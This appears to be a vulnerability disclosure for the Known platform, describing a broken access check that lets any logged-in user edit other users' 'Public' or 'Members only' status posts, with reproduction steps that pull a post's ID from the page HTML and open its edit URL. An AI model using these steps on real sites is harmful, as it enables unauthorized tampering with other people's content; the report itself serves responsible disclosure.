✍️ Description

A logged in user can edit 'Public' or 'Members only' status of other users

🕵️‍♂️ Proof of Concept

1. Create a 'Public' or 'Members only' status update with a first user
2. Login with a second user and go to the root page (e.g. http://yoursite/known) where you can see the status of the first user
3. Press F12 and search in the inspector for "textarea", you will find something like :

<textarea name="json">{"type":"like","object":"http:\/\/yoursite\/known\/view\/8cd76fb1-86de-43e2-a4b3-ef802f94ee10"}</textarea>

4. Get the identifier of the status, here it's "8cd76fb1-86de-43e2-a4b3-ef802f94ee10"
5. You can then go to http://yoursite/known/status/edit/8cd76fb1-86de-43e2-a4b3-ef802f94ee10 to edit the status

💥 Impact

Any logged in user can modify the status of other users